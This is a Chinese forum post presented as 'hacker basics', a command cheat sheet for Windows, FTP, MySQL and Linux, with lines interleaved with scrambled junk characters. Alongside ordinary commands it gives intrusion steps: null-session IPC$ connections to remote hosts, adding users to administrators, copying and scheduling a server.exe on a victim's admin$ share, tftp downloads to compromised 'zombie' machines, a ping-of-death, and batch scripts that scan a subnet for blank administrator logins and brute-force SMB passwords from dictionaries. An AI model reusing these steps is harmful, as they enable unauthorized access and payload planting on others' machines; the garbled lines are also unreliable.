黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
+ d! N0 l0 n6 Dnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
( a; T, r+ G# }! pnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
5 N: `. u6 f0 i/ _3 v* e: lnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 2 \2 H3 ~) S; I: T8 B3 t# ~
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
5 P- p% d5 b5 n* I. u5 S  N$ Pnet use h: /del 删除映射对方到本地的为H:的映射 . k2 v+ s4 e( }% @% X# Z& [
net user 用户名　密码　/add 建立用户 ! _# C) l, _' z# N
net user guest /active:yes 激活guest用户
9 h' L8 f+ B* u7 ~net user 查看有哪些用户
  b" g7 C, W' d. Lnet user 帐户名 查看帐户的属性
* v: s; i9 ?! B3 ]' qnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 . Q7 g4 O; x* N! z. R5 o
net start 查看开启了哪些服务 9 L" B( [, F5 m# J' Q5 M0 |
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
3 e( K. O- l& ?: m+ h$ `1 snet stop 服务名 停止某服务 4 `) H) X. H4 W$ y1 O9 F7 ^/ V
net time \\目标ip 查看对方时间
' Z+ S, K" i8 p2 L* K0 x; lnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
/ x& L7 Q% M* R& M* G3 c% [net view 查看本地局域网内开启了哪些共享 ' W: _5 U, k' ^. @. v1 c
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 7 Q8 E! R& Y* K
net config 显示系统网络设置
+ }" A* W8 L" e( e( q5 H3 s% i& d  r( p. Bnet logoff 断开连接的共享 " m; \/ |! k. U* v
net pause 服务名 暂停某服务
+ c, J- U; c% ^& Q) knet send ip "文本信息" 向对方发信息
& h( {6 A! K$ l- H1 Dnet ver 局域网内正在使用的网络连接类型和信息 % E. {2 M9 _9 I$ n
net share 查看本地开启的共享
/ j8 Y9 M# u# n# |; H6 znet share ipc$ 开启ipc$共享 , c8 _6 T7 d' I  K& e* P/ U
net share ipc$ /del 删除ipc$共享 1 Y7 b; M% T: Y' [3 `; J
net share c$ /del 删除C：共享 ! t7 {1 y& s( }: g- w5 g
net user guest 12345 用guest用户登陆后用将密码改为12345
/ b% c4 a& B* p" tnet password 密码 更改系统登陆密码
8 p9 n. J3 ~; K6 Pnetstat -a 查看开启了哪些端口,常用netstat -an 2 C5 F- }# L. e& U
netstat -n 查看端口的网络连接情况，常用netstat -an
. e  ~; g2 f4 q9 p; @netstat -v 查看正在进行的工作 . C6 K  i" E( U- |" y- K/ Y
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
" _5 a5 Z; p4 O1 U* v/ anetstat -s 查看正在使用的所有协议使用情况
' G) q2 g3 j8 O+ a" D' v2 M. ~3 N- qnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 , d0 F. |$ K) I2 P3 c: O
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 8 Z1 ^5 I" l0 V  b7 V$ b# g9 j6 K
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 / a  r/ o1 q' m: E9 h
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) # T/ k  ?$ x! [! ]2 k* T+ p# [
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
+ m8 B, E! c- L1 O- Ntlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
4 W3 t# w7 }; _6 Dkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
8 E* ]1 s& u% B) V5 J" q( ldel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 7 O0 K/ ~$ l/ n
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
$ {; P: ~) H3 H! U- A7 U/ kmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
) f. h7 {  f2 T- w8 k6 ~* G6 Rfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 7 J1 t5 [* ?$ {' c  i0 }% a
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 ; w* ]# {; s% z! z$ |' ^; g, r1 j( W
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 % G4 K) w9 H( E* B
at id号 /delete 停止某个已注册的计划任务 ! R) b! {% t; h9 W% X& {6 K2 n
at 查看所有的计划任务
6 ^0 R- b: Y/ c! nat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
* F) a0 q: ~! S9 @4 n- B5 p0 Z1 Ofinger username @host 查看最近有哪些用户登陆
, A4 t8 T4 ?* V# D' wtelnet ip 端口 远和登陆服务器,默认端口为23 $ G  L8 A1 x. t. c2 D  P6 s6 r% F6 ^
open ip 连接到IP（属telnet登陆后的命令） 2 y: I% I( {6 r0 q  \( w9 h* m( n
telnet 在本机上直接键入telnet 将进入本机的telnet
6 h( R: c% k& h% Q1 P1 e% g% |copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 ; r" V( S; z& c0 z8 ?* ~
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
5 B* Q4 F  _3 w7 M$ F8 \cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 ) Y0 x4 v, e5 |' R7 C1 c$ t7 m  O
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
) w* X- u" O. n6 T4 g! dxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 3 f  v. O1 K" c  Q! x6 }3 y' |
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
2 j: d; x- o+ j& `tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 + I3 D$ C" j9 E. L* a
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) * ^  B( [' w& r
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
8 @4 x' ]1 K$ l( I3 Y7 varp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
: P2 \: C( J( b% `4 wstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 4 Z3 N7 N0 T4 V3 H
mem 查看cpu使用情况 : G* h+ |& c- P/ Y2 s
attrib 文件名(目录名) 查看某文件（目录）的属性 * }# S; _* |( g0 P. k' q) `
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 0 J3 C  z9 f8 A9 |
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
" _' Z9 X. A6 s# mdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
/ ?0 J4 r. ]9 Y! |- e4 Fset 指定环境变量名称=要指派给变量的字符 设置环境变量 : k9 \/ o" v. I6 u
set 显示当前所有的环境变量 " L+ B/ x) ^, l5 u' p( _8 O' L
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
8 J6 ^! D7 c; y* A7 |. K4 wpause 暂停批处理程序，并显示出：请按任意键继续....
- G6 l5 {3 `5 S, z/ ^8 X0 iif 在批处理程序中执行条件处理（更多说明见if命令及变量）   w/ T  Y. C7 v0 r5 \5 i
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） ) }, ]  u2 e8 O/ b  v
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
3 w, |" m. T# ?3 g- F) pfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 0 N( z; w3 w! `- n6 b5 X
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 9 ~) z' L2 D6 Q2 c" W* t: N% N$ n2 b
echo 信息 在屏幕上显示出信息 # ]( z/ M% {2 v- R/ q% \8 S
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 / u8 R. R( v* |, E6 E
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
* \" U$ n  p/ d2 {+ n7 i8 ~find 文件名 查找某文件
, d; c4 L. Q8 C1 u, Qtitle 标题名字 更改CMD窗口标题名字 " b8 D  Z  [. f
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
$ P+ k9 N& |/ y# K& aprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) , [. w+ M( I  h& f/ |( m! X7 W
print 文件名 打印文本文件 ) N* S, \% v) [6 Q* \3 W" ~
ver 在DOS窗口下显示版本信息   C/ I3 o. f) w* E0 P
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
* k8 _% @+ Y/ w+ E: p/ Lformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS * ]( M/ f4 j- v/ {( Y8 B
md　目录名 创建目录
6 C% ]" O( @! A2 U: Z- G- h- s& Mreplace 源文件　要替换文件的目录 替换文件
' r* U1 p+ l# f( L& xren 原文件名　新文件名 重命名文件名
: w- ~) {8 U( C8 a: g  o& ^tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
5 c7 K7 A! ?; h9 Etype 文件名 显示文本文件的内容
1 ~7 l* a% Y- t% X& ^9 |% S% ?more 文件名 逐屏显示输出文件 + ~9 P8 e$ C  U1 ]0 D2 E3 s
doskey 要锁定的命令＝字符9 A2 W- X% t7 a3 W
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
# m* V0 h" o4 r$ Ctaskmgr 调出任务管理器 3 n& l1 f5 G: ?- b* {' _
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 1 E* X) J4 o: O0 \% Q
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
% W/ U# q/ ^5 Qexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
; z" }% ~" h- r1 {8 `0 u9 \path 路径\可执行文件的文件名 为可执行文件设置一个路径。 4 D0 `1 G9 Z) \8 z
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? 4 m/ ~  l, D* ]) N/ @' y- l4 r
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 7 Q* ]: @: k, H
regedit /e 注册表文件名 导出注册表
: e3 Z# s  x& o2 L  l6 ^cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
9 ], h. e" v' h0 o7 V/ W( Ucacls 文件名 查看文件的访问用户权限列表 ( [+ B8 q4 s  \& h/ i# P& A2 A) V
REM 文本内容 在批处理文件中添加注解 + N! e( }- T0 Z* }
netsh 查看或更改本地网络配置情况  Y; q; J$ P4 X: ]+ ~
IIS服务命令：
6 R2 [& U% `4 }% z. Aiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
0 f% Z" i1 l4 Miisreset /start或stop 启动（停止）所有Internet服务 4 D0 h1 u' {4 l/ w
iisreset /restart 停止然后重新启动所有Internet服务
. Z2 s4 U( i4 ^, X, K" x$ Tiisreset /status 显示所有Internet服务状态 / W9 L2 S! O$ E7 L* ~2 F6 c6 x
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
! D* f8 \; m. F) M0 Xiisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
+ ~* I, d( @+ D+ W& N) q3 Yiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
- ]9 m( l4 I& e3 l- s/ C: Yiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 0 x; x) K8 v/ x* K8 ~: E
FTP 命令： (后面有详细说明内容) & D% ~& L8 d: R+ [6 O
ftp的命令行格式为:  |, v9 d* R+ e  B6 e0 x& i
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
2 ^$ O0 L9 U. x5 {1 X) a; D－d 使用调试方式。
9 J: R. {% E  }( d9 Q( T－n 限制ftp的自动登录,即不使用.netrc文件。# T  s+ _+ j+ m, I" {. X
－g 取消全局文件名。
% o8 T+ d0 c8 n: Fhelp [命令] 或 ？[命令] 查看命令说明 2 A5 T  S- D& p0 j
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 7 r7 E/ c: k3 w7 e4 a
pwd 列出当前远端主机目录
! c0 N  K$ z) G1 kput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 / h* T; l* J+ N- r8 B+ M
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
5 H% w7 |% n1 O" f- cmget [remote-files] 从远端主机接收一批文件至本地主机 6 Q1 F8 d: D: `7 \- H
mput local-files 将本地主机中一批文件传送至远端主机 % x& ^+ a* y2 ^& |9 w  g) Q* s' W' Q4 P
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 * E1 e6 ]) P' C8 r4 q0 J7 m! _; g
ascii 设定以ASCII方式传送文件(缺省值) ! M: k# Q8 O* P. c* l  C
bin 或 image 设定以二进制方式传送文件 3 _! \- Z! B+ D/ m6 C8 e
bell 每完成一次文件传送,报警提示
3 |: w1 Q; {( r2 ^8 W: tcdup 返回上一级目录
- n" |( ?" j9 |3 ?; W# j4 e2 `close 中断与远程服务器的ftp会话(与open对应) * D: d, X7 [8 l* F; u$ l
open host[port] 建立指定ftp服务器连接,可指定连接端口
5 G2 Z8 C; g) L! pdelete 删除远端主机中的文件
3 _' v$ H* I2 b1 f  h, a3 Qmdelete [remote-files] 删除一批文件
7 m8 a- y/ |  W+ S- ]4 @7 Imkdir directory-name 在远端主机中建立目录
( S8 w  p6 `4 Xrename [from] [to] 改变远端主机中的文件名
6 o8 b6 A: v7 ormdir directory-name 删除远端主机中的目录
5 C/ m3 z$ J+ h* Y' H: z. z, ostatus 显示当前FTP的状态
$ R0 n# S$ ?3 M6 Usystem 显示远端主机系统类型 8 A) l: ^9 v, w. n; \
user user-name [password] [account] 重新以别的用户名登录远端主机
& b+ _7 L, I7 B) e. Wopen host [port] 重新建立一个新的连接 ; \* `3 E6 D. J
prompt 交互提示模式
9 X+ J" u& y6 c$ `! y4 G4 t0 g/ \8 Pmacdef 定义宏命令 ; S7 H$ E# ]. [4 L& H
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
2 z# h3 q6 O: |$ ~5 k# [9 Zchmod 改变远端主机的文件权限
+ |/ P# v- d4 L  K/ N, r$ z) acase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
# z8 }6 J& J% ?6 Ccd remote－dir 进入远程主机目录 ! K  h$ G7 j: p" T  Z/ E
cdup 进入远程主机目录的父目录
3 m5 E% O) d/ ~/ v, @# `. y( ~0 l! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip , Y+ o8 j; I# A% |/ @- V* M4 B
MYSQL 命令： ; {& Y3 t  U/ e, m, r) J8 C' p  n
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。* A9 F5 L8 j3 p8 G$ i
（例：mysql -h110.110.110.110 -Uroot -P123456
0 f/ e0 E; o2 e# B, W4 L注:u与root可以不用加空格，其它也一样）
3 m9 H$ W# W8 xexit 退出MYSQL
3 ~% W8 H% M$ F' u, Qmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 ' ~6 [' }. a7 W( M/ B6 ?; ]& s
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
/ L/ F/ ^; r( N, N* X, Yshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 + P" ^5 Q- C" ]6 @
use mysql；5 y, l! h* W7 b: i7 {1 G1 g
show tables; 显示库中的数据表 ' r! p9 z: B% h5 [5 E
describe 表名; 显示数据表的结构
0 ?) E" k8 p$ B1 T1 `, ?create database 库名; 建库 / z, P; V# Z5 D6 G' w* q
use 库名；2 c0 ]( h- r6 Y
create table 表名 (字段设定列表)； 建表 ! L9 {6 \6 s4 A  c( N. H2 ]! ?( k, R
drop database 库名; + }  {6 u: N0 u1 j
drop table 表名； 删库和删表 . v% Y8 I. p" Y  L# S" B  T
delete from 表名; 将表中记录清空 2 n$ p- M- T6 d3 G7 S: d; V: t
select * from 表名; 显示表中的记录
* X4 W+ l2 S# Y# ?3 r( amysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 - V" ^$ N' P# H2 I- F; U" I
win2003系统下新增命令（实用部份）：
, `$ j& V- m& A+ m5 c  X' ]shutdown /参数 关闭或重启本地或远程主机。& G1 l% z. o" D6 f
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。, ]% `8 R1 K: a0 o
例：shutdown /r /t 0 立即重启本地主机（无延时） ; d! V8 ^2 [( G  u1 Q: L8 `4 |
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。3 e' t9 K2 F4 {/ t4 ^  U
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 / N4 J) J$ g9 X, B# t5 c
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。! c- F- a4 `) k, M" ~( L
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程- y0 O- y( e+ [) {' e
Linux系统下基本命令： 要区分大小写
. H8 V, I. M) g( N# t1 n! F( @uname 显示版本信息（同win2K的 ver）
# l: T/ \% e# e3 p# [1 idir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
& j) E% e; U% h% zpwd 查询当前所在的目录位置
% T8 ~; i  G4 ]5 H6 _2 _9 Fcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
0 q: e2 Y# D/ c3 H! _2 m' U" _cat 文件名 查看文件内容 " e; t7 r: d) ^% U4 X
cat >abc.txt 往abc.txt文件中写上内容。 1 M' ]+ G0 x- h. k5 h7 K" {9 K$ }
more 文件名 以一页一页的方式显示一个文本文件。 8 G( a. O4 ^0 x; H. v3 L7 i, Q
cp 复制文件 * p& u$ I. p2 J+ B2 `, n( u0 H
mv 移动文件 ) F* e( |; }8 i9 W  v
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
) \! C- W! X* ~4 W5 E7 tmkdir 目录名 建立目录
# @9 R2 _- d4 |% s! d- armdir 删除子目录，目录内没有文档。
* C  \0 V- H7 a* O+ ^' Hchmod 设定档案或目录的存取权限 % ~* `* x. i7 r1 h8 l% K! r& [
grep 在档案中查找字符串 + {' g+ p/ \7 w& m# r
diff 档案文件比较
$ p) q  W; U. N4 S5 e; h7 {4 ufind 档案搜寻
: M5 ]* ^) N) e0 E' N5 @% l5 ]date 现在的日期、时间   e& |$ b/ K. G9 i+ o* Z: N
who 查询目前和你使用同一台机器的人以及Login时间地点
( k7 s# M4 y2 Y, c" J8 _. \4 L  p  \w 查询目前上机者的详细资料
+ F; N4 ]; w0 y% j) Iwhoami 查看自己的帐号名称
& Y, \5 v% E  v$ A* cgroups 查看某人的Group ' P  p( E! i2 H+ _
passwd 更改密码
1 r- o) p/ ?1 @history 查看自己下过的命令
) p% F7 q  o8 r! x$ [! fps 显示进程状态 : F, }3 {. g* i% m/ U+ R- i
kill 停止某进程 ; e0 m1 s# X6 D- I
gcc 黑客通常用它来编译C语言写的文件 9 J3 H& P9 _' g
su 权限转换为指定使用者
! C0 L) M" z4 V1 P: D  m0 ltelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
6 k: R0 p" K8 b9 n% yftp ftp连接上某服务器（同win2K
2 @& h# S% i7 h7 W) l/ Z1 u6 |附：批处理命令与变量) c6 W! J" o& p
1：for命令及变量 基本格式：
* G+ p1 L; O  G: dFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
7 ?$ v' d4 ]) p" Q& X* U3 r批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3# v8 E. I) b5 E) J
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}( e& k$ m3 K* R2 H) ~4 f
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开6 K: Q8 `( J* L3 i; D
command_parameters：为特定命令指定参数或命令行开关
$ w/ E# P6 B' v$ g/ |IN (set)：指在(set)中取值；DO command ：指执行command
( f! q% _8 v# S  R. q* v# c参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 2 v% R6 \1 I% _. Q9 B: R: Z
用法举例：
& Y* N6 A. {. g7 }5 o2 {: G6 Q6 f@echo off
- x! L# A) T: C5 X8 techo 用法格式：test.bat *.*.* > test.txt 1 \8 L5 F* N9 H3 z
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 2 q; g% \/ e1 s
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。( Y& U5 i( @* u
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 / B( S2 R2 J5 y) E7 d. {
@echo off
0 t- D9 ^# V. y- e1 }+ [echo 用法格式：ok.bat ip 7 P" a& y. [& O0 U$ Q' N5 ~
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 1 E4 z+ P6 A6 Y) L- L0 I
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
* z" Q# e' A# }& e& \+ q2 g2：if命令及变量 基本格式： & ]0 k; S* M4 x7 H# ?4 u7 D
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
) }; {5 v9 W. h# a+ U例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。& \  H& ^" _4 v3 m7 @
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 5 X: t$ v9 X0 Q6 y; O4 D
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。+ k' N* K" x, r5 _# Y
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
% U* v5 K7 K" n+ rIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
0 v5 T9 i0 R  G例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 6 c1 f- O. V, `, g" A" P
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”